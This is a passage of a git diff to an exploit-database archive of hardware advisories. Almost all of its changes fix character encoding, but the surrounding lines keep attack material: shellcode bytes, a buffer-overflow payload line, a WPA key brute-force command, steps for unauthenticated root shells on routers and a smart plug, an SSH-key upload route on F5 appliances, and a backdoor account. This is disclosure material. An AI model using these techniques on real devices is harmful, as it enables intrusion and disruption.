a un ataque de denegación de servicio. +Un usuario no autenticado puede reiniciar el dispositivo enviando una petición a +la interfaz de Administración remota. EXPLOIT / POC @@ -59,7 +59,7 @@ la interfaz de Administraci Disable Remote Management in Firewall -> Advanced Settings. ++ -Deshabilitar Administracin remota en Cortafuegos -> Configuracin avanzada +Deshabilitar Administración remota en Cortafuegos -> Configuración avanzada DISCLOSURE TIMELINE diff --git a/platforms/hardware/dos/11769.py b/platforms/hardware/dos/11769.py index 80a108377..7f2f05e76 100755 --- a/platforms/hardware/dos/11769.py +++ b/platforms/hardware/dos/11769.py @@ -36,7 +36,7 @@ def main():
- +  
diff --git a/platforms/hardware/dos/12093.txt b/platforms/hardware/dos/12093.txt index 680cd55dd..dbc2c1a7b 100755 --- a/platforms/hardware/dos/12093.txt +++ b/platforms/hardware/dos/12093.txt @@ -4,14 +4,14 @@ Release Date: Tue Apr 6, 2010 Affected Applications: Secure Mail (Ironmail) ver.6.7.1 Affected Platforms: FreeBSD 6.2 / Apache-Coyote 1.1 Local / Remote: Local -Severity: Medium CVSS: 4.6 (AV:L/AC:L/Au:S/C:N/I:N/A:C) -Researcher: Nahuel Grisola +Severity: Medium – CVSS: 4.6 (AV:L/AC:L/Au:S/C:N/I:N/A:C) +Researcher: Nahuel Grisolía Vendor Status: Official Patch Released. Install McAfee Email Gateway 6.7.2 Hotfix 2. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Vulnerability Description: -Users inside the CLI can run some kind of Fork Bomb in order to saturate system resources because +Users inside the CLI can run some kind of “Fork Bomb” in order to saturate system resources because of an insecure ulimit value. Download: diff --git a/platforms/hardware/dos/1464.c b/platforms/hardware/dos/1464.c index 6de4dc160..7d19c4b04 100755 --- a/platforms/hardware/dos/1464.c +++ b/platforms/hardware/dos/1464.c @@ -61,7 +61,7 @@ int main(int argc, char *argv[]) printf (" by framirez\n"); if (argc !=2) { - printf("Uso: %s \n",argv[0]); + printf("Uso: %s \n",argv[0]); exit(-1); } diff --git a/platforms/hardware/dos/18336.pl b/platforms/hardware/dos/18336.pl index 2f7dc534c..56a48bd1e 100755 --- a/platforms/hardware/dos/18336.pl +++ b/platforms/hardware/dos/18336.pl @@ -13,7 +13,7 @@ # With its Access Point and Router functionality, the Air 4450 provides wireless Internet access over # ADSL and Cable modems. Air 4450 uses 802.11n technology providing wireless data transfer # rates of up to 300 Mbps. Thus, you can transfer data, watch videos or upload your pictures to the -# Internet at N-speed. Providing 6 times faster wireless communications compared to earlier +# Internet at “N-speed”. Providing 6 times faster wireless communications compared to earlier # technologies, and 4 times greater wireless range through use of MIMO technology*, Air 4450 has # been developed to meet all your wireless needs. # diff --git a/platforms/hardware/dos/18688.txt b/platforms/hardware/dos/18688.txt index 4d88fed99..ea8d46679 100755 --- a/platforms/hardware/dos/18688.txt +++ b/platforms/hardware/dos/18688.txt @@ -33,7 +33,7 @@ Author: Luigi Auriemma From vendor's homepage: "EMC Data Protection Advisor: Manage service levels, reduce complexity, -and eliminate manual efforts with EMCs powerful data protection +and eliminate manual efforts with EMC’s powerful data protection management software that automates monitoring, analysis, alerting, and reporting across backup, replication, and virtual environments." diff --git a/platforms/hardware/dos/22739.py b/platforms/hardware/dos/22739.py index 0f1ec312b..3313105c7 100755 --- a/platforms/hardware/dos/22739.py +++ b/platforms/hardware/dos/22739.py @@ -1,6 +1,6 @@ # Exploit Author: CoreLabs (Core Security Technologies) fue descubierta por el -investigador argentino Andrs Blanco, +investigador argentino Andrés Blanco, # Vendor Homepage: # Software Link: [download link if available] # Version: 1.0 @@ -12,7 +12,7 @@ HTC Droid Incredible Samsung Spica Acer Liquid Motorola Devour -Vehculo Ford Edge +Vehículo Ford Edge Dispositivos afectados con el chipset BCM4329: Apple iPhone 4 Apple iPhone 4 Verizon diff --git a/platforms/hardware/dos/24866.txt b/platforms/hardware/dos/24866.txt index ba6012566..e3a132dce 100755 --- a/platforms/hardware/dos/24866.txt +++ b/platforms/hardware/dos/24866.txt @@ -1,4 +1,4 @@ -?#!/usr/local/bin/perl +#!/usr/local/bin/perl # # # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit diff --git a/platforms/hardware/dos/24896.sh b/platforms/hardware/dos/24896.sh index e4ce9af2d..d53220def 100755 --- a/platforms/hardware/dos/24896.sh +++ b/platforms/hardware/dos/24896.sh @@ -7,7 +7,7 @@ # # The Konftel 300IP is a flexible SIP-based conference phone, # perfect for companies that use IP voice services. Its clear, -# natural sound comes from OmniSound HD, Konftels patented +# natural sound comes from OmniSound HD, Konftel’s patented # wideband audio technology. The stylishly designed # Konftel 300IP is packed with intelligent features for more # efficient conference calls. Record and store meetings on a diff --git a/platforms/hardware/dos/32702.txt b/platforms/hardware/dos/32702.txt index 2b4bee61b..d5bf01d14 100755 --- a/platforms/hardware/dos/32702.txt +++ b/platforms/hardware/dos/32702.txt @@ -54,38 +54,38 @@ Once the crash occurs the following is the registers state of the SoftAX appliance: -rax 00 0 +rax 0×0 0 rbx 0x1e30300 31654656 -rcx 06 6 +rcx 0×6 6 rdx 0xffffffff 4294967295 rsi 0xcac18f12 3401682706 -rdi 04141414141414141 4702111234474983745 -rbp 04141414141414141 04141414141414141 +rdi 0×4141414141414141 4702111234474983745 +rbp 0×4141414141414141 0×4141414141414141 rsp 0x7fffbdf9b400 0x7fffbdf9b400 -r8 02000 8192 -r9 020 32 -r10 00 0 +r8 0×2000 8192 +r9 0×20 32 +r10 0×0 0 r11 0x7f10b4cec180 139709729653120 -r12 00 0 +r12 0×0 0 r13 0x1e30318 31654680 r14 0x1e30300 31654656 r15 0x1e33b58 31669080 -rip 0524149 0524149 -eflags 010246 [ PF ZF IF RF ] -cs 033 51 +rip 0×524149 0×524149 +eflags 0×10246 [ PF ZF IF RF ] +cs 0×33 51 ss 0x2b 43 -ds 00 0 -es 00 0 -fs 00 0 -gs 00 0 +ds 0×0 0 +es 0×0 0 +fs 0×0 0 +gs 0×0 0 fctrl 0x37f 895 -fstat 00 0 +fstat 0×0 0 ftag 0xffff 65535 -fiseg 00 0 -fioff 00 0 -foseg 00 0 -fooff 00 0 -fop 00 0 +fiseg 0×0 0 +fioff 0×0 0 +foseg 0×0 0 +fooff 0×0 0 +fop 0×0 0 mxcsr 0x1f80 [ IM DM ZM OM UM PM ] diff --git a/platforms/hardware/dos/33328.txt b/platforms/hardware/dos/33328.txt index 9f11db8c1..5a3b0241d 100755 --- a/platforms/hardware/dos/33328.txt +++ b/platforms/hardware/dos/33328.txt @@ -9,7 +9,7 @@ # CVE : [CVE-2014-2085] #OVERVIEW -A vulnerability has been found in some Skybox View Appliances Admin +A vulnerability has been found in some Skybox View Appliances’ Admin interfaces which would allow a potential malicious party to bypass the authentication mechanism and execute reboot and/or shutdown of appliance self @@ -20,7 +20,7 @@ tools that deliver the security intelligence needed to act fast to minimize risks and eliminate attack vectors. Based on a powerful risk analytics platform that links data from vulnerability scanners, threat intelligence feeds, firewalls and other network infrastructure -devices Skybox gives you context to prioritize risks accurately and +devices – Skybox gives you context to prioritize risks accurately and automatically, in minutes. #VULNERABILITY DESCRIPTION diff --git a/platforms/hardware/dos/34307.txt b/platforms/hardware/dos/34307.txt index 92f3b807d..677db167e 100755 --- a/platforms/hardware/dos/34307.txt +++ b/platforms/hardware/dos/34307.txt @@ -1,4 +1,4 @@ -# Exploit Title: Sky Broadband Router ? Weak algorithm used to generate WPA-PSK Key +# Exploit Title: Sky Broadband Router – Weak algorithm used to generate WPA-PSK Key # Google Dork: # Date: 08/08/2014 # Author: Matt O'Connor / Planit Computing @@ -12,41 +12,41 @@ The SR101 routers supplied by Sky Broadband are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker. The WPA-PSK pass phrase has the following features: -? Random -? A to Z Uppercase only -? 8 characters long -? 208,827,064,576 possible combinations ( AAAAAAAA ? ZZZZZZZZ ) 26^8 +• Random +• A to Z Uppercase only +• 8 characters long +• 208,827,064,576 possible combinations ( AAAAAAAA – ZZZZZZZZ ) 26^8 We notified Sky Broadband about the problem in January 2014 yet Sky Broadband are still supplying customers with routers / modems that use this weak algorithm. At the time, graphics cards were expensive and clustering several machines was not financially viable to the average hacker. We purchased a used rig in December 2013, comprising off: -? Windows 7 -? I3 Processor -? 4GB RAM -? 2TB Drive -? Radeon HD 5850 +• Windows 7 +• I3 Processor +• 4GB RAM +• 2TB Drive +• Radeon HD 5850 -We generated 26 dictionary files using ?mask processor? by ATOM, piping each letter out to its own file, for example: +We generated 26 dictionary files using “mask processor” by ATOM, piping each letter out to its own file, for example: -A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA ? AZZZZZZZ -B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA ? BZZZZZZZ +A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA – AZZZZZZZ +B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA – BZZZZZZZ etc -Each .txt file weighed in at around 60GB?s each. The 26 files took up about 1.6TB of storage. +Each .txt file weighed in at around 60GB’s each. The 26 files took up about 1.6TB of storage. We now had the complete key space, partitioned into 26 different files. This allowed us to distribute the brute force attack amongst multiple computers. There are other ways with ocl-hashcat but this was the simplest. Using our Radeon HD5850 on standard settings, we were hitting 80,000 keys per second. Breakdown below: -? 26^8 = 208,827,064,576 ( 208 billion possible combinations ) -? 26^8 / 80,000 keys per second = 2,610,338 seconds -? 2,610,338 / 60 seconds = 43,505 minutes -? 43,505 / 60 minutes = 725 hours -? 725 hours / 24 hours = 30 Days +• 26^8 = 208,827,064,576 ( 208 billion possible combinations ) +• 26^8 / 80,000 keys per second = 2,610,338 seconds +• 2,610,338 / 60 seconds = 43,505 minutes +• 43,505 / 60 minutes = 725 hours +• 725 hours / 24 hours = 30 Days -For ?185, we had built a computer that could crack the default Sky Broadband wireless password within 30 days. The WPA-PSK handshake we used started with the letter S and was cracked within 96 hours. +For €185, we had built a computer that could crack the default Sky Broadband wireless password within 30 days. The WPA-PSK handshake we used started with the letter S and was cracked within 96 hours. We ended up getting a second machine for the same price which resulted in our maximum cracking time being reduced to 15 days. -If you?re using the default password on your Sky Broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols. +If you’re using the default password on your Sky Broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols. diff --git a/platforms/hardware/dos/6726.txt b/platforms/hardware/dos/6726.txt index 2e0c53703..12df72623 100755 --- a/platforms/hardware/dos/6726.txt +++ b/platforms/hardware/dos/6726.txt @@ -32,7 +32,7 @@ The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web browser for the S60 mobile phone platform developed by Nokia. It is built upon S60WebKit, a port of the open source WebKit project to the S60 platform. According to several sources, the S60 software on Symbian OS is the -world’s most popular software for smartphones. +world’s most popular software for smartphones. This version of the Nokia Mini Map Browser does not properly validate JavaScript input embedded in visited HTML pages. An aggressor can easily trigger Denial of diff --git a/platforms/hardware/local/24899.txt b/platforms/hardware/local/24899.txt index fd0d32504..1b23630ef 100755 --- a/platforms/hardware/local/24899.txt +++ b/platforms/hardware/local/24899.txt @@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive features set. -########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IPsubnets, together with VLAN capabilities and user management +########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency. ############################Advisory:################################################### @@ -38,7 +38,7 @@ Vigor3900> -###vigor 3900 is built in BusyBox : Trying to shell the device by using ?sh draytekv3900? will gain root shell without asking for credintial . +###vigor 3900 is built in BusyBox : Trying to shell the device by using “sh draytekv3900” will gain root shell without asking for credintial . ####And what I have noticed that any user you create from the dashboard will be able to access the root shell whereas . Vigor3900> sh draytekv3900 diff --git a/platforms/hardware/local/25718.txt b/platforms/hardware/local/25718.txt index 4ae60fad1..11f00885b 100755 --- a/platforms/hardware/local/25718.txt +++ b/platforms/hardware/local/25718.txt @@ -109,7 +109,7 @@ Vulnerable Section(s): [+] PS Menu > Game (Spiel) Vulnerable Module(s): - [+] SpeicherDaten (DienstProgramm) PS3 > USB Gert + [+] SpeicherDaten (DienstProgramm) PS3 > USB Gerät Affected Section(s): [+] Title - Save Game Preview Resource (Detail Listing) @@ -134,9 +134,9 @@ as update you will fail to reproduce! PoC: PARAM.SFO -PSF @            h   %     ,   4   +PSF Ä @            h   %     ,   4   $ C  @ ( V   h j  - p t   + € p t  € ð ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE 40ac78551a88fdc SD @@ -148,7 +148,7 @@ ExpSkills: VL-LAB-TRAINING Operation: 1% Trojaners: 0% -... ~\A; 40ac78551a88fdc +... Õõ~\˜òíA×éú;óç 40ac78551a88fdc ... BLES00371-NARUTO_STORM-0 HACKINGBKM 1 @@ -195,7 +195,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2013 | Vulnerability Laboratory + Copyright © 2013 | Vulnerability Laboratory diff --git a/platforms/hardware/local/27285.txt b/platforms/hardware/local/27285.txt index 6fec10972..425716f99 100755 --- a/platforms/hardware/local/27285.txt +++ b/platforms/hardware/local/27285.txt @@ -11,7 +11,7 @@ Version affected: 12.07.19.00 Product description: Karotz is the successor to the "Nabaztag". Nabaztag is a Wi-Fi enabled ambient electronic device in the shape of a rabbit, invented by Rafi -Haladjian and Olivier Mvel, and manufactured by the company Violet.[1] +Haladjian and Olivier Mével, and manufactured by the company Violet.[1] Nabaztag was designed to be a "smart object" comparable to those manufactured by Ambient Devices; it can connect to the Internet (to download weather forecasts, read its owner's email, etc.). It is also diff --git a/platforms/hardware/remote/10000.txt b/platforms/hardware/remote/10000.txt index c65126e7b..ac0b59f82 100755 --- a/platforms/hardware/remote/10000.txt +++ b/platforms/hardware/remote/10000.txt @@ -35,7 +35,7 @@ Product: Cisco ACE XML Gateway <= 6.0 Vulnerabily: Internal IP Address Disclosure Vendor: Cisco Systems, Inc. http://www.cisco.com Product URL: http://www.cisco.com/en/US/products/ps7314/ -Author: nitrus [ Alejandro Hernandez H. ] +Author: nitrØus [ Alejandro Hernandez H. ] Discovery Date: 24/Aug/2009 Attack Vector: Remote CVSS v2 Base Score: 5 (Medium) [ AV:N/AC:L/Au:N/C:P/I:N/A:N ] @@ -121,11 +121,11 @@ Exploit/PoC Code # # -=- PRIV8 -=- 0day -=- PRIV8 -=- 0day -=- PRIV8 -=- # -# -[nitrus]- [ Alejandro Hernandez H. ] +# -[nitrØus]- [ Alejandro Hernandez H. ] # nitrousenador -at- gmail -dot- com # http://www.brainoverflow.org # -# Mexic / 25-Aug-29 +# MexicØ / 25-Aug-2ØØ9 # # -=- PUBLIC NOW -=- # Published on September 24th, 2009 @@ -197,18 +197,18 @@ Shouts ======================================= Cisco PSIRT (Product Security Incident Response Team) guys, chr1x, ril0, crypkey, alt3kx, hkm, CRAc, #mendozaaaa, nediam, nahual, tr3w, darko, dex, Daemon, beck, -ran, Hctor L., Zeus, www.underground.org.mx, Bucio, etc... etc... etc... +ran, Héctor L., Zeus, www.underground.org.mx, Bucio, etc... etc... etc... Author Information ======================================= -Author: nitrus [ Alejandro Hernandez H. ] +Author: nitrØus [ Alejandro Hernandez H. ] E-mail: nitrousenador -at- gmail -dot- com Website: http://www.brainoverflow.org Country: Mexico About CubilFelino Security Research Lab ======================================= -It's very peaceful (underground), but dark place in Mxico which has a lot of +It's very peaceful (underground), but dark place in México which has a lot of desktop and laptop computers, (hardc0re) network hardware, wire/unwired stuff, some hijacked Internet connections, music gear and studio (midi controllers and synthesizers), Psytrance/Drum & Bass music almost always resounding the walls, diff --git a/platforms/hardware/remote/10451.txt b/platforms/hardware/remote/10451.txt index 382bb8b67..4f4740205 100755 --- a/platforms/hardware/remote/10451.txt +++ b/platforms/hardware/remote/10451.txt @@ -52,21 +52,21 @@ Let's see what parameters can be configured via this protocol. Any value after the '=' can be modified. -+Protocol version = 1.10; # Obvious -+fb type = EVIL-DEVICE; # Device Type -+module version = 0.66.6; # ... -+mac = 00-30-11-00-CA-FE; # MAC -+ip = 192.168.1.252; # ... -+sn = 255.255.255.0; # Network Mask -+gw = 192.168.1.1; # Gateway -+dhcp = off; # whether the device is using a DHCP server for ++“Protocol version = 1.10; ” # Obvious ++”fb type = EVIL-DEVICE; ” # Device Type ++”module version = 0.66.6; ” # ... ++”mac = 00-30-11-00-CA-FE; ” # MAC ++”ip = 192.168.1.252; ” # ... ++”sn = 255.255.255.0; ” # Network Mask ++”gw = 192.168.1.1; ” # Gateway ++”dhcp = off; ” # whether the device is using a DHCP server for obtaining the IP address. (on/off) -+pswd = off; # whether the device is using a PASSWORD(on/off) -+hn = morroBufalo; # hostname (optional) -+dns1 = 192.168.1.33; # Primary DNS -+dns2 = 192.168.1.34; # Secondary DNS (optional) -+password = admin; # old password (if any, admin by default) -+new password = fatbird; # new password ++”pswd = off; ” # whether the device is using a PASSWORD(on/off) ++”hn = morroBufalo; ” # hostname (optional) ++”dns1 = 192.168.1.33; ” # Primary DNS ++”dns2 = 192.168.1.34; ” # Secondary DNS (optional) ++”password = admin; ” # old password (if any, admin by default) ++”new password = fatbird; ” # new password These parameters are sent in a UDP packet in plain text, concatenating each one and separated by a ";". @@ -146,8 +146,8 @@ Code (asm) .text:004036AA push ecx .text:004036AB mov byte ptr [esp+530h], 1 .text:004036B3 call sub_425666 -. -. +…. +…. .text:004256D9 mov cl, [edx] .text:004256DB mov [eax], cl .text:004256DD inc eax @@ -185,7 +185,7 @@ s.send("protocol version = 1.10; " +"gw = 192.168.1.1; " +"dhcp = off; " +"pswd = off; " - +"hn = "+"A"*060+"; " + +"hn = "+"A"*0×60+"; " +"dns1 = 192.168.1.33;") @@ -202,4 +202,4 @@ passwords... Regards, -Rubn. +Rubén. diff --git a/platforms/hardware/remote/10510.txt b/platforms/hardware/remote/10510.txt index 49e0d8db6..2eef5d390 100755 --- a/platforms/hardware/remote/10510.txt +++ b/platforms/hardware/remote/10510.txt @@ -76,7 +76,7 @@ http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by -David Eduardo Acosta Rodrguez (deacosta (at) isecauditors (dot) com, +David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com, dacosta (at) computer (dot) org). Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com)) for additional research. diff --git a/platforms/hardware/remote/1081.c b/platforms/hardware/remote/1081.c index 8825de05b..a212b14f1 100755 --- a/platforms/hardware/remote/1081.c +++ b/platforms/hardware/remote/1081.c @@ -15,9 +15,9 @@ SDP: yes ftp> open 00:04:3e:65:a1:c8 Connected. ftp> ls -Z8)Tnb 6 uu3^v0^5?24?#ڼV6V - ϭ) -XqX6Y0 +Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V + Ï­¹¿)ýÞ +ýÞÑýÞÐÉî¼Xq¶X6¶Y0 ---------------------- @@ -124,7 +124,7 @@ Hopefully his bluetooth stack confuses us for his PDA. Obviously you need to find out the general area of your shellcode and fix the exploit accordingly. 0xbffffb70: '\220' , -"3\203^\201v\016\2310^\2035c\035\20424x#ڼV6\210V\r\020\017Z8a\b\020\017)\210Tnb\fϭ)\210\n\2042\a)\227\222Xq\235X6\214Y0\020\rb\r\020\017" +"3É\203éëèÿÿÿÿÀ^\201v\016\231î0^\203îüâô¨5c\035Ê\20424ÿ¶©×x#°ÈÚ¼V6\210²V\r\020\017Z8Á¾a\b\020\017ýÞ)\210á½Tnb\fÏ­¹¿)\210ýÞ\n\2042\a)ÑýÞÐ\227Éî\222¼Xq¶\235X6¶\214Y0\020\rb\r\020\017ýÞ" root@frieza:/var/spool/affix/Inbox# pico ../btftp-ex.c root@frieza:/var/spool/affix/Inbox# cc -o ../btftp-ex ../btftp-ex.c @@ -159,9 +159,9 @@ SDP: yes ftp> open 00:04:3e:65:a1:c8 Connected. ftp> ls -Z8)Tnb 6 uu3^v0^5?24?#ڼV6V - ϭ) -XqX6Y0 +Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V + Ï­¹¿)ýÞ +ýÞÑýÞÐÉî¼Xq¶X6¶Y0 You can tell when they have connected via the following log file entries. diff --git a/platforms/hardware/remote/14536.txt b/platforms/hardware/remote/14536.txt index 04a18b2a3..b32c40306 100755 --- a/platforms/hardware/remote/14536.txt +++ b/platforms/hardware/remote/14536.txt @@ -123,7 +123,7 @@ traffic for IP addresses belonging to the internal Celerra network. 3. Hide NFS exports and show it only based on the configured access. Setting -forceFullShowmount param to 0 (default is 1) will hide the / from the list +forceFullShowmount param to 0 (default is 1) will hide the ³/² from the list since only Control Station have access to it for administration purpose. 4. Disable IP reflect diff --git a/platforms/hardware/remote/17244.txt b/platforms/hardware/remote/17244.txt index cf8478108..392676890 100755 --- a/platforms/hardware/remote/17244.txt +++ b/platforms/hardware/remote/17244.txt @@ -308,7 +308,7 @@ RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 -Geschftsfhrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck +Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck Advisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web @@ -453,4 +453,4 @@ RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 -Geschftsfhrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck +Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck diff --git a/platforms/hardware/remote/17883.txt b/platforms/hardware/remote/17883.txt index 3bc0435c3..2146ee50d 100755 --- a/platforms/hardware/remote/17883.txt +++ b/platforms/hardware/remote/17883.txt @@ -39,7 +39,7 @@ Blue Coat Reporter gives managers powerful visibility into all Web-related user activity. Beyond URL Filtering, Reporter provides customizable, at-a-glance dashboards and reports along with intuitive drill-down capabilities making it an invaluable part of security, compliance, bandwidth management, and other -business-critical efforts necessary in today?s competitive environment. +business-critical efforts necessary in today’s competitive environment. Reporter quickly processes robust log data from Blue Coat ProxySG and ProxyClient along with conveyed data from Webfilter and ProxyAV, providing easy-to-view @@ -264,13 +264,13 @@ I'm having a great time in Buenos Aires and in Ekoparty. To some friends, chr1x, CRAc, hkm, alt3kx, tr3w, dex, LightOS, Sirdarckat, calderpwn, b0rr3x, beck, daemon, scp.scorpion, Caar2000, Rolman, #mendozaaaa, Raaka_elgaupo, -vendetta, zeus, Hector Lpez, etc. etc. etc.. +vendetta, zeus, Hector López, etc. etc. etc.. Author ================================================================================= -Author: nitrus [ Alejandro Hernandez H. ] +Author: nitrØus [ Alejandro Hernandez H. ] E-mail: nitrousenador -at- gmail -dot- com Twitter: http://twitter.com/nitr0usmx Website: http://www.brainoverflow.org diff --git a/platforms/hardware/remote/18779.txt b/platforms/hardware/remote/18779.txt index 0eeb5cbb9..7c92f82bc 100755 --- a/platforms/hardware/remote/18779.txt +++ b/platforms/hardware/remote/18779.txt @@ -19,7 +19,7 @@ contractor who installed RuggedCom equipment at a US Air Force base: Problem: An undocumented backdoor account exists within all released versions -of RuggedCom's Rugged Operating System (ROS). The username for the +of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor diff --git a/platforms/hardware/remote/18893.py b/platforms/hardware/remote/18893.py index 3648f9dd0..8f646681e 100755 --- a/platforms/hardware/remote/18893.py +++ b/platforms/hardware/remote/18893.py @@ -5,7 +5,7 @@ ================================== ''' # HP VSA / SANiQ Hydra client -# Nicolas Grgoire +# Nicolas Grégoire # v0.5 ''' ================================== diff --git a/platforms/hardware/remote/21983.c b/platforms/hardware/remote/21983.c index 914538fa1..5efc5d51e 100755 --- a/platforms/hardware/remote/21983.c +++ b/platforms/hardware/remote/21983.c @@ -15,7 +15,7 @@ It has been reported that Linksys WAP11-V2.2 is prone to this issue, but to a le /* Orig version by Tom Knienieder - Patched by H?kan Carlsson for DWL-900AP+ v2.2 + Patched by H�kan Carlsson for DWL-900AP+ v2.2 */ diff --git a/platforms/hardware/remote/26412.pl b/platforms/hardware/remote/26412.pl index 79358a5cf..0ed023f07 100755 --- a/platforms/hardware/remote/26412.pl +++ b/platforms/hardware/remote/26412.pl @@ -4,7 +4,7 @@ # ===================================================== # author: | email: # Todor Donev (latin) | todor dot donev -# (cyrillic) | @googlemail.com +# Òîäîð Äîíåâ (cyrillic) | @googlemail.com # ===================================================== # type: | platform: | description: # remote | linux | attacker can get root diff --git a/platforms/hardware/remote/27873.txt b/platforms/hardware/remote/27873.txt index f5e02c236..294045534 100755 --- a/platforms/hardware/remote/27873.txt +++ b/platforms/hardware/remote/27873.txt @@ -216,4 +216,4 @@ Authenticate(); | Quote | +-------+ -I would rather die of passion than of boredom. - Vincent van Gogh. \ No newline at end of file +“I would rather die of passion than of boredom.” - Vincent van Gogh. \ No newline at end of file diff --git a/platforms/hardware/remote/28056.txt b/platforms/hardware/remote/28056.txt index 50047c965..2f9bb2b82 100755 --- a/platforms/hardware/remote/28056.txt +++ b/platforms/hardware/remote/28056.txt @@ -4,7 +4,7 @@ Exploitation of this vulnerability will allow full access to the router device. This analysis describes the bug and includes a way to get developer access to recent versions of Mikrotik RouterOS using the /etc/devel-login file. This is done by forging a modified NPK file using a correct signature and logging -into the device with username devel and the password of the administrator. This will drop into a busybox shell for +into the device with username ‘devel’ and the password of the administrator. This will drop into a busybox shell for further researching the sshd vulnerability using gdb and strace tools that have been compiled for the Mikrotik busybox platform. diff --git a/platforms/hardware/remote/30935.txt b/platforms/hardware/remote/30935.txt index 3cfe1c244..755219f9d 100755 --- a/platforms/hardware/remote/30935.txt +++ b/platforms/hardware/remote/30935.txt @@ -6,7 +6,7 @@ An attacker may leverage the cross-site scripting issues to execute arbitrary sc The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device. -http://www.example.com:/ping.asp?pingstr=?> The following cross-site request-forgery example was provided: diff --git a/platforms/hardware/remote/32801.txt b/platforms/hardware/remote/32801.txt index 185e53b52..199508928 100755 --- a/platforms/hardware/remote/32801.txt +++ b/platforms/hardware/remote/32801.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Barracuda Load Balancer 640 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-mod/index.cgi?realm="> \ No newline at end of file +http://www.example.com/cgi-mod/index.cgi?realm="> \ No newline at end of file diff --git a/platforms/hardware/remote/34465.txt b/platforms/hardware/remote/34465.txt index 605507c1c..94671e412 100755 --- a/platforms/hardware/remote/34465.txt +++ b/platforms/hardware/remote/34465.txt @@ -1,4 +1,4 @@ When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance. -The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the cmi module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. +The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34465.pdf \ No newline at end of file diff --git a/platforms/hardware/remote/35103.txt b/platforms/hardware/remote/35103.txt index 1cd55130c..f826c2e76 100755 --- a/platforms/hardware/remote/35103.txt +++ b/platforms/hardware/remote/35103.txt @@ -12,15 +12,15 @@ CVE : CVE-2014-7279 Exploit & p0c _____________ - Konke is a smart Home Furnishing products (http://www.kankunit.com/) in China, the product has a security vulnerability, an attacker could exploit the vulnerability to obtain equipment management authority. + “Konke” is a smart Home Furnishing products (http://www.kankunit.com/) in China, the product has a security vulnerability, an attacker could exploit the vulnerability to obtain equipment management authority. - Konke Smart Plug open 23 port?we can telnet the 23 port?we can get root without password. + Konke Smart Plug open 23 port,we can telnet the 23 port,we can get root without password. - 1?Scan Konke. you can use nmap scan the 23 port. - 2?open cmd telnet Konke's 23 port. - 3?now you are the root. it is a openwrt,you can use busybox do everything! you can use "reboot" command to reboot Konke.and so on + 1、Scan Konke. you can use nmap scan the 23 port. + 2、open cmd telnet Konke's 23 port. + 3、now you are the root. it is a openwrt,you can use busybox do everything! you can use "reboot" command to reboot Konke.and so on…… _____________ \ No newline at end of file diff --git 